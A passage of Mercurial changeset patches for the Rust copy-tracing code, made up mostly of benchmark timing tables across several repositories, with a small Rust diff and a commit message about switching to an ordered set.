0.051267 s, 0.050992 s, 
-0.000275 s, × 0.9946, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.087755 s, 0.087444 s, -0.000311 s, × 0.9965, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.061818 s, 0.062487 s, +0.000669 s, × 1.0108, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.634253 s, 0.634909 s, +0.000656 s, × 1.0010, 14 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013179 s, 0.013360 s, +0.000181 s, × 1.0137, 6680 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.119643 s, 0.120775 s, +0.001132 s, × 1.0095, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000085 s, 0.000085 s, +0.000000 s, × 1.0000, 42 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000107 s, 0.000108 s, +0.000001 s, × 1.0093, 54 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000176 s, 0.000176 s, +0.000000 s, × 1.0000, 58 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000743 s, 0.000747 s, +0.000004 s, × 1.0054, 83 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010246 s, 0.010128 s, -0.000118 s, × 0.9885, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015853 s, 0.015899 s, +0.000046 s, × 1.0029, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.062971 s, 0.062215 s, -0.000756 s, × 0.9880, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.518337 s, 0.521004 s, +0.002667 s, × 1.0051, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000090 s, 0.000090 s, +0.000000 s, × 1.0000, 45 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.000268 s, 0.000264 s, -0.000004 
s, × 0.9851, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000187 s, 0.000186 s, -0.000001 s, × 0.9947, 20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000661 s, 0.000660 s, -0.000001 s, × 0.9985, 94 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003494 s, 0.003542 s, +0.000048 s, × 1.0137, 1180 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.070509 s, 0.071574 s, +0.001065 s, × 1.0151, 11929 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006489 s, 0.006498 s, +0.000009 s, × 1.0014, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005070 s, 0.005206 s, +0.000136 s, × 1.0268, 126 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.065241 s, 0.065535 s, +0.000294 s, × 1.0045, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027284 s, 0.027139 s, -0.000145 s, × 0.9947, 44 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.203671 s, 0.201924 s, -0.001747 s, × 0.9914, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.239373 s, 1.257201 s, +0.017828 s, × 1.0144, 8 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.649803 s, 1.663045 s, +0.013242 s, × 1.0080, 8 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000868 s, 0.000866 s, -0.000002 s, × 0.9977, 433 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000885 s, 0.000883 s, -0.000002 s, × 0.9977, 441 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.000165 s, 0.000163 s, -0.000002 s, × 0.9879, 40 µs/rev mozilla-try 
x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.001147 s, 0.001139 s, -0.000008 s, × 0.9930, 569 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.032885 s, 0.032753 s, -0.000132 s, × 0.9960, 32752 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.071304 s, 0.073266 s, +0.001962 s, × 1.0275, 12211 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006506 s, 0.006567 s, +0.000061 s, × 1.0094, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005486 s, 0.005427 s, -0.000059 s, × 0.9892, 132 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.064677 s, 0.064058 s, -0.000619 s, × 0.9904, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.306000 s, 0.303320 s, -0.002680 s, × 0.9912, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.288217 s, 0.288456 s, +0.000239 s, × 1.0008, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.086117 s, 0.085925 s, -0.000192 s, × 0.9978, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027512 s, 0.027302 s, -0.000210 s, × 0.9924, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 1.998239 s, 2.034596 s, +0.036357 s, × 1.0182, 20 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.688201 s, 0.694030 s, +0.005829 s, × 1.0085, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 4.389428 s, 4.407723 s, +0.018295 s, × 1.0042, 12 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.578736 s, 0.574355 s, -0.004381 s, × 0.9924, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d 
: 362229 revs, 4.363599 s, 4.457827 s, +0.094228 s, × 1.0216, 12 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.324129 s, 4.351696 s, +0.027567 s, × 1.0064, 12 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.565727 s, 1.570065 s, +0.004338 s, × 1.0028, 8 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 86.722016 s, 80.828689 s, -5.893327 s, × 0.9320, 352 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 35.113727 s, 34.094064 s, -1.019663 s, × 0.9710, 89 µs/rev private : 459513 revs, 27.397070 s, 27.435529 s, +0.038459 s, × 1.0014, 59 µs/rev Differential Revision: https://phab.mercurial-scm.org/D9655 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -565,7 +565,11 @@ (Some(mut e1), Some(mut e2)) => { let cs1 = e1.get_mut(); let cs2 = e2.get(); - cs1.mark_delete_with_pair(current_rev, &cs2); + if cs1 == cs2 { + cs1.mark_delete(current_rev); + } else { + cs1.mark_delete_with_pair(current_rev, &cs2); + } e2.insert(cs1.clone()); } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608550499 -3600 # Mon Dec 21 12:34:59 2020 +0100 # Node ID 60b2b7ecf9cbd30d14ee8fd26f15ae3f942566b2 # Parent aa19d60ac9747bcc0624a1c78b887f62c50bd0bd copies-rust: use imrs::OrdSet instead of imrs::HashSet This yield small speedup all over the board, and a large one for our slower cases: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 2.034596 s, 1.465264 s, -0.569332 
s, × 0.7202, 15 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.694030 s, 0.690376 s, -0.003654 s, × 0.9947, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 4.407723 s, 4.011322 s, -0.396401 s, × 0.9101, 11 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.574355 s, 0.573541 s, -0.000814 s, × 0.9986, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 4.457827 s, 3.981133 s, -0.476694 s, × 0.8931, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.351696 s, 3.996647 s, -0.355049 s, × 0.9184, 11 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 80.828689 s, 50.244975 s, -30.583714 s, × 0.6216, 219 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 34.094064 s, 20.030023 s, -14.064041 s, × 0.5875, 52 µs/rev private : 459513 revs, 27.435529 s, 24.490825 s, -2.944704 s, × 0.8927, 53 µs/rev We also got significantly faster than the implementation using is_ancestors except for one of our reference case: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 5.138169 s, 4.011322 s, -1.126847 s, × 0.7807, 11 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 5.127809 s, 3.981133 s, -1.146676 s, × 0.7764, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.971136 s, 3.996647 s, -0.974489 s, × 0.8040, 11 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 
1.741678 s, 1.520607 s, -0.221071 s, × 0.8731, 7 µs/rev private : 459513 revs, 37.179470 s, 24.490825 s, -12.688645 s, × 0.6587, 53 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 40.314822 s, 50.244975 s, +9.930153 s, × 1.2463, 219 µs/rev Below are three different benchmarks comparing this changeset to: * the previous one, * the implementation based on `is_ancestors`, * the filelog copy tracing. ### Compared to the previous ones Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000043 s, 0.000041 s, -0.000002 s, × 0.9535, 41 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000114 s, 0.000116 s, +0.000002 s, × 1.0175, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004899 s, 0.004933 s, +0.000034 s, × 1.0069, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000196 s, 0.000193 s, -0.000003 s, × 0.9847, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000049 s, 0.000048 s, -0.000001 s, × 0.9796, 48 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000117 s, 0.000114 s, -0.000003 s, × 0.9744, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.000322 s, 0.000319 s, -0.000003 s, × 0.9907, 319 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.011856 s, 0.012025 s, +0.000169 s, × 1.0143, 2004 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 0.050992 s, 0.050525 s, -0.000467 s, × 0.9908, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.087444 s, 0.085713 s, -0.001731 s, × 
0.9802, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.062487 s, 0.061825 s, -0.000662 s, × 0.9894, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.634909 s, 0.543998 s, -0.090911 s, × 0.8568, 12 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013360 s, 0.013455 s, +0.000095 s, × 1.0071, 6727 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.120775 s, 0.117479 s, -0.003296 s, × 0.9727, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000085 s, 0.000084 s, -0.000001 s, × 0.9882, 42 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000108 s, 0.000111 s, +0.000003 s, × 1.0278, 55 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000176 s, 0.000175 s, -0.000001 s, × 0.9943, 58 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000747 s, 0.000732 s, -0.000015 s, × 0.9799, 81 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010128 s, 0.010062 s, -0.000066 s, × 0.9935, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015899 s, 0.015659 s, -0.000240 s, × 0.9849, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.062215 s, 0.062744 s, +0.000529 s, × 1.0085, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.521004 s, 0.499449 s, -0.021555 s, × 0.9586, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000090 s, 0.000088 s, -0.000002 s, × 0.9778, 44 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.000264 s, 0.000266 s, +0.000002 s, × 1.0076, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000186 s, 0.000182 s, -0.000004 s, × 0.9785, 
20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000660 s, 0.000656 s, -0.000004 s, × 0.9939, 93 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003542 s, 0.003389 s, -0.000153 s, × 0.9568, 1129 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.071574 s, 0.075882 s, +0.004308 s, × 1.0602, 12647 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006498 s, 0.006479 s, -0.000019 s, × 0.9971, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005206 s, 0.004889 s, -0.000317 s, × 0.9391, 119 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.065535 s, 0.064394 s, -0.001141 s, × 0.9826, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027139 s, 0.026815 s, -0.000324 s, × 0.9881, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.201924 s, 0.202864 s, +0.000940 s, × 1.0047, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.257201 s, 1.219445 s, -0.037756 s, × 0.9700, 7 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.663045 s, 1.613857 s, -0.049188 s, × 0.9704, 7 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000866 s, 0.000873 s, +0.000007 s, × 1.0081, 436 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000883 s, 0.000885 s, +0.000002 s, × 1.0023, 442 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.000163 s, 0.000161 s, -0.000002 s, × 0.9877, 40 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.001139 s, 0.001138 s, -0.000001 s, × 0.9991, 569 µs/rev mozilla-try 
x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.032753 s, 0.033399 s, +0.000646 s, × 1.0197, 33399 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.073266 s, 0.075445 s, +0.002179 s, × 1.0297, 12574 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006567 s, 0.006456 s, -0.000111 s, × 0.9831, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005427 s, 0.005462 s, +0.000035 s, × 1.0064, 133 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.064058 s, 0.064117 s, +0.000059 s, × 1.0009, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.303320 s, 0.297563 s, -0.005757 s, × 0.9810, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.288456 s, 0.282463 s, -0.005993 s, × 0.9792, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.085925 s, 0.084038 s, -0.001887 s, × 0.9780, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027302 s, 0.027306 s, +0.000004 s, × 1.0001, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 2.034596 s, 1.465264 s, -0.569332 s, × 0.7202, 15 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.694030 s, 0.690376 s, -0.003654 s, × 0.9947, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 4.407723 s, 4.011322 s, -0.396401 s, × 0.9101, 11 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.574355 s, 0.573541 s, -0.000814 s, × 0.9986, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 4.457827 s, 3.981133 s, -0.476694 s, × 0.8931, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c 
ca82787bb23c : 359344 revs, 4.351696 s, 3.996647 s, -0.355049 s, × 0.9184, 11 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.570065 s, 1.520607 s, -0.049458 s, × 0.9685, 7 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 80.828689 s, 50.244975 s, -30.583714 s, × 0.6216, 219 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 34.094064 s, 20.030023 s, -14.064041 s, × 0.5875, 52 µs/rev private : 459513 revs, 27.435529 s, 24.490825 s, -2.944704 s, × 0.8927, 53 µs/rev ### Compared to the implementation using `is_ancestor` Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000042 s, 0.000041 s, -0.000001 s, × 0.9762, 41 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000110 s, 0.000116 s, +0.000006 s, × 1.0545, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004945 s, 0.004933 s, -0.000012 s, × 0.9976, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000192 s, 0.000193 s, +0.000001 s, × 1.0052, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000049 s, 0.000048 s, -0.000001 s, × 0.9796, 48 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000112 s, 0.000114 s, +0.000002 s, × 1.0179, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.000323 s, 0.000319 s, -0.000004 s, × 0.9876, 319 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.010042 s, 0.012025 s, +0.001983 s, × 1.1975, 2004 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e 
: 4785 revs, 0.049813 s, 0.050525 s, +0.000712 s, × 1.0143, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.079937 s, 0.085713 s, +0.005776 s, × 1.0723, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.059412 s, 0.061825 s, +0.002413 s, × 1.0406, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.533769 s, 0.543998 s, +0.010229 s, × 1.0192, 12 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013147 s, 0.013455 s, +0.000308 s, × 1.0234, 6727 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.110680 s, 0.117479 s, +0.006799 s, × 1.0614, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000085 s, 0.000084 s, -0.000001 s, × 0.9882, 42 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000107 s, 0.000111 s, +0.000004 s, × 1.0374, 55 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000175 s, 0.000175 s, +0.000000 s, × 1.0000, 58 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000720 s, 0.000732 s, +0.000012 s, × 1.0167, 81 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010019 s, 0.010062 s, +0.000043 s, × 1.0043, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015602 s, 0.015659 s, +0.000057 s, × 1.0037, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.058759 s, 0.062744 s, +0.003985 s, × 1.0678, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.491550 s, 0.499449 s, +0.007899 s, × 1.0161, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000087 s, 0.000088 s, +0.000001 s, × 1.0115, 44 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 
revs, 0.000268 s, 0.000266 s, -0.000002 s, × 0.9925, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000181 s, 0.000182 s, +0.000001 s, × 1.0055, 20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000661 s, 0.000656 s, -0.000005 s, × 0.9924, 93 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003256 s, 0.003389 s, +0.000133 s, × 1.0408, 1129 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.066749 s, 0.075882 s, +0.009133 s, × 1.1368, 12647 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006462 s, 0.006479 s, +0.000017 s, × 1.0026, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.004919 s, 0.004889 s, -0.000030 s, × 0.9939, 119 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.062421 s, 0.064394 s, +0.001973 s, × 1.0316, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.026633 s, 0.026815 s, +0.000182 s, × 1.0068, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.197792 s, 0.202864 s, +0.005072 s, × 1.0256, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.259970 s, 1.219445 s, -0.040525 s, × 0.9678, 7 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.689184 s, 1.613857 s, -0.075327 s, × 0.9554, 7 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000865 s, 0.000873 s, +0.000008 s, × 1.0092, 436 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000893 s, 0.000885 s, -0.000008 s, × 0.9910, 442 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.000172 s, 0.000161 s, 
-0.000011 s, × 0.9360, 40 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.001159 s, 0.001138 s, -0.000021 s, × 0.9819, 569 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.031621 s, 0.033399 s, +0.001778 s, × 1.0562, 33399 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.068571 s, 0.075445 s, +0.006874 s, × 1.1002, 12574 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006452 s, 0.006456 s, +0.000004 s, × 1.0006, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005443 s, 0.005462 s, +0.000019 s, × 1.0035, 133 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.063180 s, 0.064117 s, +0.000937 s, × 1.0148, 9 µs/rev mozilla-try 